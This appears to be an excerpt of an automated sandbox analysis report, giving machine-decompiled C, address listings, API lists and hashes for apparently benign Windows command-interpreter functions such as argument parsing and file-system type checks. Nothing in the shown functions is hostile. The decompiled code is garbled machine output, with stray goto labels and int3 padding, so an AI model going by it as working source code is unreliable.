						_t129 = 0;
						_v220 = 0;
						while(1) {
							_t164 =  *_t185 & 0x0000ffff;
							_v224 = _t164;
							if(_t164 == 0) {
								break;
							}
							if(_t136 == 0) {
								L9:
								 *(_t191 + _t129 * 2 - 0xd4) = _t164;
								_t129 = _t129 + 1;
								_v220 = _t129;
							} else {
								_t135 = wcschr(_t136, _t164);
								_t193 = _t193 + 8;
								_t129 = _v220;
								if(_t135 == 0) {
									_t164 = _v224;
									goto L9;
								}
							}
							_t185 =  &(_t185[1]);
							if(_t129 < 0x63) {
								continue;
							}
							break;
						}
						_t183 = _v228;
						_t130 = _t129 + _t129;
						if(_t130 >= 0xc8) {
							E011E711D(_t130, _t136, _t164, _t179, _t183, _t186);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t191);
							_push(_t136);
							_push(_t186);
							_v264 = 0;
							_push(_t183);
							__eflags = 0;
							_v260 =  &_v264;
							_t136 = E011DE9A0(0, 0);
							_v268 = _t136;
							goto L62;
						} else {
							_v224 = 1;
							 *((short*)(_t191 + _t130 - 0xd4)) = 0;
							_t134 =  *_t186 & 0x0000ffff;
							_v220 = 1;
							if(_t134 != 0) {
								_t144 = _t134;
								L14:
								if(_t144 == 0x22) {
									L17:
									_v224 = 0;
									if(_t136 == 0) {
										L19:
										 *_t180 =  *_t186;
										_t180 = _t180 + 2;
										if( *_t186 == 0x22) {
											while(1) {
												_t81 = _t186[1];
												_t143 = _t186;
												_t186 =  &(_t186[1]);
												 *_t180 = _t81;
												_t180 = _t180 + 2;
												_t82 =  *_t186 & 0x0000ffff;
												__eflags = _t82;
												if(_t82 == 0) {
													break;
												}
												__eflags = _t82 - 0x22;
												if(_t82 == 0x22) {
													goto L20;
												} else {
													__eflags = _t186[1];
													if(_t186[1] != 0) {
														continue;
													} else {
														goto L20;
													}
												}
												goto L22;
											}
											_t186 = _t143;
										}
										L20:
										_v220 = 0;
									} else {
										_t85 = wcschr(_t136,  *_t186 & 0x0000ffff);
										_t193 = _t193 + 8;
										if(_t85 != 0) {
											_t86 = _a4;
											__eflags = _t86 & 0x00000002;
											if((_t86 & 0x00000002) != 0) {
												__eflags = _v220;
												_t87 =  *_t186 & 0x0000ffff;
												if(_v220 == 0) {
													_t180 = _t180 + 2;
												}
												 *_t180 = _t87;
												_v220 = 1;
												_t180 = _t180 + 4;
											} else {
												__eflags = _t86 & 0x00000004;
												if((_t86 & 0x00000004) != 0) {
													 *_t180 =  *_t186;
												}
												_v220 = 0;
												_t180 = _t180 + 2;
											}
										} else {
											goto L19;
										}
									}
									_t83 = _t186[1] & 0x0000ffff;
									_t186 =  &(_t186[1]);
									_t144 = _t83;
									if(_t83 != 0) {
										goto L14;
									}
								} else {
									_t89 = iswspace(_t144);
									_t193 = _t193 + 4;
									if(_t89 != 0) {
										L24:
										_t90 = _a4;
										__eflags = _t90 & 0x00000001;
										if((_t90 & 0x00000001) != 0) {
											__eflags = _v224;
											if(_v224 == 0) {
												goto L17;
											} else {
												goto L25;
											}
										} else {
											L25:
											_t91 = _t90 & 0x00000002;
											__eflags = _t91;
											_v228 = _t91;
											if(_t91 == 0) {
												L28:
												_t93 = _a4 & 0x00000004;
												__eflags = _t93;
												_v232 = _t93;
												if(_t93 != 0) {
													L96:
													_t79 = E011DD7D4(_t136,  *_t186);
													__eflags = _t79;
													if(_t79 != 0) {
														goto L17;
													} else {
														goto L29;
													}
												} else {
													L29:
													_t94 =  *_t186 & 0x0000ffff;
													__eflags = _t94;
													if(_t94 != 0) {
														_t160 = _t94;
														while(1) {
															__eflags = _t160 - 0x22;
															if(_t160 == 0x22) {
																break;
															}
															_t114 = iswspace(_t160);
															_t193 = _t193 + 4;
															__eflags = _t114;
															if(_t114 != 0) {
																L39:
																__eflags = _v228;
																if(_v228 == 0) {
																	L42:
																	__eflags = _v232;
																	if(_v232 != 0) {
																		_t115 = E011DD7D4(_t136,  *_t186);
																		__eflags = _t115;
																		if(_t115 != 0) {
																			break;
																		} else {
																			goto L43;
																		}
																	} else {
																		L43:
																		_t116 = _t186[1] & 0x0000ffff;
																		_t186 =  &(_t186[1]);
																		_t160 = _t116;
																		__eflags = _t116;
																		if(_t116 != 0) {
																			continue;
																		} else {
																		}
																	}
																} else {
																	__eflags = _t136;
																	if(_t136 == 0) {
																		goto L42;
																	} else {
																		_t118 = wcschr(_t136,  *_t186 & 0x0000ffff);
																		_t193 = _t193 + 8;
																		__eflags = _t118;
																		if(_t118 != 0) {
																			break;
																		} else {
																			goto L42;
																		}
																	}
																}
															} else {
																_t121 = wcschr( &_v216,  *_t186 & 0x0000ffff);
																_t193 = _t193 + 8;
																__eflags = _t121;
																if(_t121 != 0) {
																	goto L39;
																} else {
																	break;
																}
															}
															goto L22;
														}
														__eflags =  *_t186;
														if( *_t186 != 0) {
															__eflags = _v224;
															if(_v224 == 0) {
																__eflags = _v220;
																if(_v220 == 0) {
																	_t180 = _t180 + 2;
																	__eflags = _t180;
																}
															}
															_v220 = 1;
															goto L17;
														}
													}
												}
											} else {
												__eflags = _t136;
												if(_t136 == 0) {
													goto L28;
												} else {
													_t123 = wcschr(_t136,  *_t186 & 0x0000ffff);
													_t193 = _t193 + 8;
													__eflags = _t123;
													if(_t123 != 0) {
														goto L17;
													} else {
														goto L28;
													}
												}
											}
										}
									} else {
										_t126 = wcschr( &_v216,  *_t186 & 0x0000ffff);
										_t193 = _t193 + 8;
										if(_t126 != 0) {
											goto L24;
										} else {
											goto L17;
										}
									}
								}
							}
							L22:
							_t145 = _v236;
							_t180 = _t180 - _t145 >> 1;
							_t167 = 4 + _t180 * 2;
							if(E011E0100(_t145, 4 + _t180 * 2) == 0) {
								E011F9287(_t145);
								__imp__longjmp(0x120b8b8, 1);
								asm("int3");
								L102:
								_t169 = _t145 + 2;
								do {
									_t96 =  *_t145;
									_t145 = _t145 + 2;
									__eflags = _t96;
								} while (_t96 != 0);
								_t183 = _t180 + (_t145 - _t169 >> 1);
								L68:
								_t148 = _t183 + _t183;
								_t187 = E011E00B0(_t183 + _t183);
								_v8 = _t187;
								__eflags = _t187;
								if(_t187 == 0) {
									E011F9287(_t148);
									__imp__longjmp(0x120b8b8, 1);
									asm("int3");
									__eflags =  *0x120fa90;
									if( *0x120fa90 != 0) {
										E011F82EB(_t148);
									}
									__eflags = 0;
									__eflags =  *0x120fa88;
									 *0x11fd5c8 = 0;
									if( *0x120fa88 != 0) {
										E011F8121(_t187, 0);
									}
									return _t187;
								}
								_t150 = _t136[0xf];
								__eflags = _t150;
								if(_t150 != 0) {
									E011E1040(_t187, _t183, _t150);
								}
								_t104 = 0;
								__eflags = _t183;
								if(_t183 == 0) {
									L106:
									_t104 = 0x80070057;
								} else {
									__eflags = _t183 - 0x7fffffff;
									if(_t183 > 0x7fffffff) {
										goto L106;
									}
								}
								__eflags = _t104;
								if(_t104 < 0) {
									L109:
									_t172 = 0;
								} else {
									_t104 = 0;
									_t159 = _t183;
									_t173 = _t187;
									__eflags = _t183;
									if(_t183 == 0) {
										L108:
										_t104 = 0x80070057;
										goto L109;
									} else {
										while(1) {
											__eflags =  *_t173 - _t104;
											if( *_t173 == _t104) {
												break;
											}
											_t173 = _t173 + 2;
											_t159 = _t159 - 1;
											__eflags = _t159;
											if(_t159 != 0) {
												continue;
											} else {
												goto L108;
											}
											goto L114;
										}
										__eflags = _t159;
										if(_t159 == 0) {
											goto L108;
										} else {
											_t172 = _t183 - _t159;
											__eflags = _t172;
										}
									}
								}
								__eflags = _t104;
								if(_t104 >= 0) {
									_t113 = _v8 + _t172 * 2;
									_t190 = _t183 - _t172;
									__eflags = _t190;
									if(_t190 == 0) {
										L83:
										_t113 = _t113 - 2;
									} else {
										_t177 = _t172 + 0x7ffffffe + _t190 - _t183;
										_t183 = 0x120faa0 - _t113;
										__eflags = 0x120faa0;
										while(1) {
											__eflags = _t177;
											if(_t177 == 0) {
												break;
											}
											_t158 =  *(_t113 + _t183) & 0x0000ffff;
											__eflags = _t158;
											if(_t158 == 0) {
												break;
											} else {
												 *_t113 = _t158;
												_t177 = _t177 - 1;
												_t113 =  &(_t113[0]);
												_t190 = _t190 - 1;
												__eflags = _t190;
												if(_t190 != 0) {
													continue;
												} else {
													goto L83;
												}
											}
											goto L85;
										}
										__eflags = _t190;
										if(_t190 == 0) {
											goto L83;
										}
									}
									L85:
									_t187 = _v8;
									__eflags = 0;
									 *_t113 = 0;
								}
								_t136[0xf] = _t187;
								while(1) {
									L62:
									_t105 = E011DEEC8();
									__eflags = _t105;
									if(_t105 == 0) {
										break;
									}
									_t108 = E011DF030(1);
									__eflags = _t108 - 0x4000;
									if(_t108 == 0x4000) {
										_t145 = _t136[0xf];
										_t180 =  *0x120fa8c;
										__eflags = _t145;
										if(_t145 != 0) {
											goto L102;
										}
										goto L68;
									} else {
										_t188 = _v12;
										_t109 = E011E02B0(_t136, _t188, _t183, _t188);
										__eflags = _t109;
										if(_t109 != 0) {
											_t110 =  *_t188;
											do {
												_t69 = _t110 + 0x14; // 0x14
												_t137 = _t69;
												_t110 =  *_t137;
												_v12 = _t137;
												__eflags = _t110;
											} while (_t110 != 0);
											_t136 = _v20;
											continue;
										} else {
											__eflags = 0;
											E011DF300(_t109, 0, 0, _t109);
										}
									}
									break;
								}
								_t136[0xd] = _v16;
								return _t136;
							} else {
								L23:
								return E011E6FD0(_t75, _t136, _v12 ^ _t191, _t167, _t180, _t186);
							}
						}
					}
				}
				goto L114;
			}














































































                                                    0x011dea40
                                                    0x011dea40
                                                    0x011dea4b
                                                    0x011dea52
                                                    0x011dea57
                                                    0x011dea59
                                                    0x011dea5e
                                                    0x011ded52
                                                    0x011ded57
                                                    0x011ded5c
                                                    0x011ded5e
                                                    0x00000000
                                                    0x011ded64
                                                    0x011ec03d
                                                    0x011ec049
                                                    0x00000000
                                                    0x011ec049
                                                    0x011dea64
                                                    0x011dea64
                                                    0x011dea64
                                                    0x011dea67
                                                    0x011dea67
                                                    0x011dea6a
                                                    0x011dea6d
                                                    0x011dea76
                                                    0x011dea7d
                                                    0x011dea82
                                                    0x011dea8a
                                                    0x011ec04f
                                                    0x011ec04f
                                                    0x011ec05b
                                                    0x00000000
                                                    0x011dea90
                                                    0x011dea90
                                                    0x011dea96
                                                    0x011dea9b
                                                    0x011dea9d
                                                    0x011deaa3
                                                    0x011deaa3
                                                    0x011deaa6
                                                    0x011deaaf
                                                    0x00000000
                                                    0x00000000
                                                    0x011deab3
                                                    0x011dead0
                                                    0x011dead0
                                                    0x011dead8
                                                    0x011dead9
                                                    0x011deab5
                                                    0x011deab7
                                                    0x011deabd
                                                    0x011deac2
                                                    0x011deac8
                                                    0x011deaca
                                                    0x00000000
                                                    0x011deaca
                                                    0x011deac8
                                                    0x011deadf
                                                    0x011deae5
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011deae5
                                                    0x011deae7
                                                    0x011deaed
                                                    0x011deaf4
                                                    0x011ded75
                                                    0x011ded7a
                                                    0x011ded7b
                                                    0x011ded7c
                                                    0x011ded7d
                                                    0x011ded7e
                                                    0x011ded7f
                                                    0x011ded82
                                                    0x011ded88
                                                    0x011ded89
                                                    0x011ded8d
                                                    0x011ded94
                                                    0x011ded95
                                                    0x011ded97
                                                    0x011ded9f
                                                    0x011deda1
                                                    0x00000000
                                                    0x011deafa
                                                    0x011deafc
                                                    0x011deb06
                                                    0x011deb0e
                                                    0x011deb11
                                                    0x011deb1e
                                                    0x011deb24
                                                    0x011deb26
                                                    0x011deb2a
                                                    0x011deb5a
                                                    0x011deb5a
                                                    0x011deb66
                                                    0x011deb7e
                                                    0x011deb81
                                                    0x011deb84
                                                    0x011deb8b
                                                    0x011decf0
                                                    0x011decf0
                                                    0x011decf4
                                                    0x011decf6
                                                    0x011decf9
                                                    0x011decfc
                                                    0x011decff
                                                    0x011ded02
                                                    0x011ded05
                                                    0x00000000
                                                    0x00000000
                                                    0x011ded07
                                                    0x011ded0a
                                                    0x00000000
                                                    0x011ded10
                                                    0x011ded10
                                                    0x011ded15
                                                    0x00000000
                                                    0x011ded17
                                                    0x00000000
                                                    0x011ded17
                                                    0x011ded15
                                                    0x00000000
                                                    0x011ded0a
                                                    0x011ded6e
                                                    0x011ded6e
                                                    0x011deb91
                                                    0x011deb91
                                                    0x011deb68
                                                    0x011deb6d
                                                    0x011deb73
                                                    0x011deb78
                                                    0x011deccd
                                                    0x011decd0
                                                    0x011decd2
                                                    0x011ded1c
                                                    0x011ded23
                                                    0x011ded26
                                                    0x011ded69
                                                    0x011ded69
                                                    0x011ded28
                                                    0x011ded2e
                                                    0x011ded38
                                                    0x011decd4
                                                    0x011decd4
                                                    0x011decd6
                                                    0x011ec092
                                                    0x011ec092
                                                    0x011decdc
                                                    0x011dece6
                                                    0x011dece6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011deb78
                                                    0x011deb9b
                                                    0x011deb9f
                                                    0x011deba2
                                                    0x011deba7
                                                    0x00000000
                                                    0x00000000
                                                    0x011deb2c
                                                    0x011deb2d
                                                    0x011deb33
                                                    0x011deb38
                                                    0x011debde
                                                    0x011debde
                                                    0x011debe1
                                                    0x011debe3
                                                    0x011ded40
                                                    0x011ded47
                                                    0x00000000
                                                    0x011ded4d
                                                    0x00000000
                                                    0x011ded4d
                                                    0x011debe9
                                                    0x011debe9
                                                    0x011debe9
                                                    0x011debe9
                                                    0x011debec
                                                    0x011debf2
                                                    0x011dec0e
                                                    0x011dec11
                                                    0x011dec11
                                                    0x011dec14
                                                    0x011dec1a
                                                    0x011ec061
                                                    0x011ec066
                                                    0x011ec06b
                                                    0x011ec06d
                                                    0x00000000
                                                    0x011ec073
                                                    0x00000000
                                                    0x011ec073
                                                    0x011dec20
                                                    0x011dec20
                                                    0x011dec20
                                                    0x011dec23
                                                    0x011dec26
                                                    0x011dec28
                                                    0x011dec30
                                                    0x011dec30
                                                    0x011dec34
                                                    0x00000000
                                                    0x00000000
                                                    0x011dec37
                                                    0x011dec3d
                                                    0x011dec40
                                                    0x011dec42
                                                    0x011dec8a
                                                    0x011dec8a
                                                    0x011dec91
                                                    0x011deca9
                                                    0x011deca9
                                                    0x011decb0
                                                    0x011ec07d
                                                    0x011ec082
                                                    0x011ec084
                                                    0x00000000
                                                    0x011ec08a
                                                    0x00000000
                                                    0x011ec08a
                                                    0x011decb6
                                                    0x011decb6
                                                    0x011decb6
                                                    0x011decba
                                                    0x011decbd
                                                    0x011decbf
                                                    0x011decc2
                                                    0x00000000
                                                    0x00000000
                                                    0x011decc8
                                                    0x011decc2
                                                    0x011dec93
                                                    0x011dec93
                                                    0x011dec95
                                                    0x00000000
                                                    0x011dec97
                                                    0x011dec9c
                                                    0x011deca2
                                                    0x011deca5
                                                    0x011deca7
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011deca7
                                                    0x011dec95
                                                    0x011dec44
                                                    0x011dec4f
                                                    0x011dec55
                                                    0x011dec58
                                                    0x011dec5a
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011dec5a
                                                    0x00000000
                                                    0x011dec42
                                                    0x011dec5c
                                                    0x011dec60
                                                    0x011dec66
                                                    0x011dec6d
                                                    0x011dec6f
                                                    0x011dec76
                                                    0x011dec78
                                                    0x011dec78
                                                    0x011dec78
                                                    0x011dec76
                                                    0x011dec7b
                                                    0x00000000
                                                    0x011dec7b
                                                    0x011dec60
                                                    0x011dec26
                                                    0x011debf4
                                                    0x011debf4
                                                    0x011debf6
                                                    0x00000000
                                                    0x011debf8
                                                    0x011debfd
                                                    0x011dec03
                                                    0x011dec06
                                                    0x011dec08
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011dec08
                                                    0x011debf6
                                                    0x011debf2
                                                    0x011deb3e
                                                    0x011deb49
                                                    0x011deb4f
                                                    0x011deb54
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011deb54
                                                    0x011deb38
                                                    0x011deb2a
                                                    0x011debad
                                                    0x011debad
                                                    0x011debb5
                                                    0x011debb7
                                                    0x011debc5
                                                    0x011ec09a
                                                    0x011ec0a6
                                                    0x011ec0ac
                                                    0x011ec0ad
                                                    0x011ec0ad
                                                    0x011ec0b0
                                                    0x011ec0b0
                                                    0x011ec0b3
                                                    0x011ec0b6
                                                    0x011ec0b6
                                                    0x011ec0bf
                                                    0x011dedfa
                                                    0x011dedfa
                                                    0x011dee02
                                                    0x011dee04
                                                    0x011dee07
                                                    0x011dee09
                                                    0x011ec0f7
                                                    0x011ec103
                                                    0x011ec109
                                                    0x011ec10a
                                                    0x011ec111
                                                    0x011ec117
                                                    0x011ec117
                                                    0x011defe1
                                                    0x011defe3
                                                    0x011defea
                                                    0x011defef
                                                    0x011ec125
                                                    0x011ec125
                                                    0x00000000
                                                    0x011deff5
                                                    0x011dee0f
                                                    0x011dee12
                                                    0x011dee14
                                                    0x011ec0cb
                                                    0x011ec0cb
                                                    0x011dee1a
                                                    0x011dee1c
                                                    0x011dee1e
                                                    0x011ec0d5
                                                    0x011ec0d5
                                                    0x011dee24
                                                    0x011dee24
                                                    0x011dee2a
                                                    0x00000000
                                                    0x00000000
                                                    0x011dee2a
                                                    0x011dee30
                                                    0x011dee32
                                                    0x011ec0f0
                                                    0x011ec0f0
                                                    0x011dee38
                                                    0x011dee38
                                                    0x011dee3a
                                                    0x011dee3c
                                                    0x011dee3e
                                                    0x011dee40
                                                    0x011ec0eb
                                                    0x011ec0eb
                                                    0x00000000
                                                    0x011dee46
                                                    0x011dee46
                                                    0x011dee46
                                                    0x011dee49
                                                    0x00000000
                                                    0x00000000
                                                    0x011ec0df
                                                    0x011ec0e2
                                                    0x011ec0e2
                                                    0x011ec0e5
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011ec0e5
                                                    0x011dee4f
                                                    0x011dee51
                                                    0x00000000
                                                    0x011dee57
                                                    0x011dee59
                                                    0x011dee59
                                                    0x011dee59
                                                    0x011dee51
                                                    0x011dee40
                                                    0x011dee5b
                                                    0x011dee5d
                                                    0x011dee64
                                                    0x011dee67
                                                    0x011dee67
                                                    0x011dee69
                                                    0x011dee99
                                                    0x011dee99
                                                    0x011dee6b
                                                    0x011dee7a
                                                    0x011dee7c
                                                    0x011dee7c
                                                    0x011dee80
                                                    0x011dee80
                                                    0x011dee82
                                                    0x00000000
                                                    0x00000000
                                                    0x011dee84
                                                    0x011dee88
                                                    0x011dee8b
                                                    0x00000000
                                                    0x011dee8d
                                                    0x011dee8d
                                                    0x011dee90
                                                    0x011dee91
                                                    0x011dee94
                                                    0x011dee94
                                                    0x011dee97
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011dee97
                                                    0x00000000
                                                    0x011dee8b
                                                    0x011dee9e
                                                    0x011deea0
                                                    0x00000000
                                                    0x00000000
                                                    0x011deea0
                                                    0x011deea2
                                                    0x011deea2
                                                    0x011deea5
                                                    0x011deea7
                                                    0x011deea7
                                                    0x011deeaa
                                                    0x011deda4
                                                    0x011deda4
                                                    0x011deda4
                                                    0x011deda9
                                                    0x011dedab
                                                    0x00000000
                                                    0x00000000
                                                    0x011dedb2
                                                    0x011dedb7
                                                    0x011dedbc
                                                    0x011dede9
                                                    0x011dedec
                                                    0x011dedf2
                                                    0x011dedf4
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011dedbe
                                                    0x011dedbe
                                                    0x011dedc3
                                                    0x011dedc8
                                                    0x011dedca
                                                    0x011deeb2
                                                    0x011deeb4
                                                    0x011deeb4
                                                    0x011deeb4
                                                    0x011deeb7
                                                    0x011deeb9
                                                    0x011deebc
                                                    0x011deebc
                                                    0x011deec0
                                                    0x00000000
                                                    0x011dedd0
                                                    0x011dedd3
                                                    0x011dedd5
                                                    0x011dedd5
                                                    0x011dedca
                                                    0x00000000
                                                    0x011dedbc
                                                    0x011dedde
                                                    0x011dede8
                                                    0x011debcb
                                                    0x011debcb
                                                    0x011debdb
                                                    0x011debdb
                                                    0x011debc5
                                                    0x011deaf4
                                                    0x011dea8a
                                                    0x00000000

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: wcschr$iswspacelongjmp
                                                    • String ID: =,;
                                                    • API String ID: 4008636219-1539845467
                                                    • Opcode ID: 090fd844132778b0661caa7d76ff908c2c05b314ef849060a375e3c381cf35fc
                                                    • Instruction ID: 43664dc3122cc4c10c3e97e971d26d6a92d415cc76c40dbf87aaba725fab154d
                                                    • Opcode Fuzzy Hash: 090fd844132778b0661caa7d76ff908c2c05b314ef849060a375e3c381cf35fc
                                                    • Instruction Fuzzy Hash: A4D12775A01612CBDF3C9F6CD8487BE7BE5EF4020AF14446EE9469F281EB749980CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011FB9D3, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 154COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 42%
                                                    			E011FB9D3(void* __ecx, char __edx, char _a4) {
				signed int _v8;
				long _v20;
				char _v24;
				int _v28;
				void _v548;
				int _v556;
				char _v560;
				int _v564;
				void _v1084;
				char _v1085;
				long _v1092;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				void* _t63;
				WCHAR* _t64;
				int _t65;
				WCHAR* _t66;
				void* _t69;
				void* _t70;
				void* _t71;
				WCHAR* _t73;
				WCHAR* _t81;
				void* _t89;
				WCHAR* _t90;
				signed int _t91;

				_t88 = __edx;
				_t41 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t41 ^ _t91;
				_v1085 = __edx;
				_t90 = 0;
				_v20 = 0x104;
				_v28 = 0;
				_t73 = 1;
				_t89 = __ecx;
				_v24 = 1;
				memset( &_v548, 0, 0x104);
				_v564 = 0;
				_v560 = 1;
				_v556 = 0x104;
				memset( &_v1084, 0, 0x104);
				if(E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E011E0C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L27:
					_t90 = _t73;
					goto L28;
				} else {
					_t63 = _v564;
					if(_t63 == 0) {
						_t63 =  &_v1084;
					}
					__imp__GetVolumePathNameW(_t89, _t63, _v556);
					if(_t63 == 0) {
						goto L27;
					} else {
						_t64 = _v564;
						if(_t64 == 0) {
							_t64 =  &_v1084;
						}
						_t65 = GetDriveTypeW(_t64);
						if(_t65 == 0 || _t65 == 4) {
							_t73 = _t90;
							goto L27;
						} else {
							_t66 = _v28;
							if(_t66 == 0) {
								_t66 =  &_v548;
							}
							_t81 = _v564;
							if(_t81 == 0) {
								_t81 =  &_v1084;
							}
							if(GetVolumeInformationW(_t81, _t90, _t90, _t90,  &_v1092,  &_v1092, _t66, _v20) == 0) {
								goto L27;
							} else {
								_t69 = _v28;
								if(_t69 == 0) {
									_t69 =  &_v548;
								}
								__imp___wcsicmp(_t69, L"NTFS");
								if(_t69 != 0) {
									if(_a4 == 0) {
										L21:
										if(_v1085 == 0) {
											L28:
											_t73 = _t90;
										} else {
											_t70 = _v28;
											if(_t70 == 0) {
												_t70 =  &_v548;
											}
											__imp___wcsicmp(_t70, L"CSVFS");
											if(_t70 != 0) {
												goto L28;
											} else {
											}
										}
									} else {
										_t71 = _v28;
										if(_t71 == 0) {
											_t71 =  &_v548;
										}
										__imp___wcsicmp(_t71, L"REFS");
										if(_t71 != 0) {
											goto L21;
										}
									}
								}
							}
						}
					}
				}
				__imp__??_V@YAXPAX@Z(_v564);
				__imp__??_V@YAXPAX@Z();
				return E011E6FD0(_t73, _t73, _v8 ^ _t91, _t88, _t89, _t90, _v28);
			}






























                                                    0x011fb9d3
                                                    0x011fb9de
                                                    0x011fb9e5
                                                    0x011fb9f0
                                                    0x011fb9f7
                                                    0x011fb9f9
                                                    0x011fb9fe
                                                    0x011fba07
                                                    0x011fba0a
                                                    0x011fba0c
                                                    0x011fba0f
                                                    0x011fba17
                                                    0x011fba22
                                                    0x011fba28
                                                    0x011fba37
                                                    0x011fba60
                                                    0x011fbb85
                                                    0x011fbb85
                                                    0x00000000
                                                    0x011fba90
                                                    0x011fba90
                                                    0x011fba98
                                                    0x011fba9a
                                                    0x011fba9a
                                                    0x011fbaa8
                                                    0x011fbab0
                                                    0x00000000
                                                    0x011fbab6
                                                    0x011fbab6
                                                    0x011fbabe
                                                    0x011fbac0
                                                    0x011fbac0
                                                    0x011fbac7
                                                    0x011fbacf
                                                    0x011fbb83
                                                    0x00000000
                                                    0x011fbade
                                                    0x011fbade
                                                    0x011fbae3
                                                    0x011fbae5
                                                    0x011fbae5
                                                    0x011fbaeb
                                                    0x011fbaf3
                                                    0x011fbaf5
                                                    0x011fbaf5
                                                    0x011fbb13
                                                    0x00000000
                                                    0x011fbb15
                                                    0x011fbb15
                                                    0x011fbb1a
                                                    0x011fbb1c
                                                    0x011fbb1c
                                                    0x011fbb28
                                                    0x011fbb32
                                                    0x011fbb38
                                                    0x011fbb59
                                                    0x011fbb60
                                                    0x011fbb87
                                                    0x011fbb87
                                                    0x011fbb62
                                                    0x011fbb62
                                                    0x011fbb67
                                                    0x011fbb69
                                                    0x011fbb69
                                                    0x011fbb75
                                                    0x011fbb7f
                                                    0x00000000
                                                    0x00000000
                                                    0x011fbb81
                                                    0x011fbb7f
                                                    0x011fbb3a
                                                    0x011fbb3a
                                                    0x011fbb3f
                                                    0x011fbb41
                                                    0x011fbb41
                                                    0x011fbb4d
                                                    0x011fbb57
                                                    0x00000000
                                                    0x00000000
                                                    0x011fbb57
                                                    0x011fbb38
                                                    0x011fbb32
                                                    0x011fbb13
                                                    0x011fbacf
                                                    0x011fbab0
                                                    0x011fbb8f
                                                    0x011fbb99
                                                    0x011fbbb2

                                                    APIs
                                                    • memset.MSVCRT ref: 011FBA0F
                                                    • memset.MSVCRT ref: 011FBA37
                                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                                    • GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 011FBAA8
                                                    • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 011FBAC7
                                                    • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 011FBB0B
                                                    • _wcsicmp.MSVCRT ref: 011FBB28
                                                    • _wcsicmp.MSVCRT ref: 011FBB4D
                                                    • _wcsicmp.MSVCRT ref: 011FBB75
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011FBB8F
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011FBB99
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                    • String ID: CSVFS$NTFS$REFS
                                                    • API String ID: 3510147486-2605508654
                                                    • Opcode ID: f5cb1b98b98330f5ca5b9354e9a59bc48fd6f4c930044e61112adaf2d658705a
                                                    • Instruction ID: 3db9261824c524a6b4d51de2342579f8ebcffa884e9a100c7a087b82e7a779f9
                                                    • Opcode Fuzzy Hash: f5cb1b98b98330f5ca5b9354e9a59bc48fd6f4c930044e61112adaf2d658705a
                                                    • Instruction Fuzzy Hash: A1515971A0421D9FEF39CAA5DC88BEBBBB8EF14254F4400ADE605D3145DB74DA84CB64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011D9520, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 128COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: _wcsicmp
                                                    • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                                                    • API String ID: 2081463915-3124875276
                                                    • Opcode ID: 8e707505f1527dff521f1d85b8678826c74bf4a0f7a09bff22bbc1ba2f659c02
                                                    • Instruction ID: 1c8a1eec7a84777907af1baae7f2797f17b6388be35321655d3d405e1e917a4b
                                                    • Opcode Fuzzy Hash: 8e707505f1527dff521f1d85b8678826c74bf4a0f7a09bff22bbc1ba2f659c02
                                                    • Instruction Fuzzy Hash: 3A4128313007069AEB3DAF39F869B6A7BA5EB5462CF54012FE213865C1EF72D181C711
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E06C0, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 90COMMON
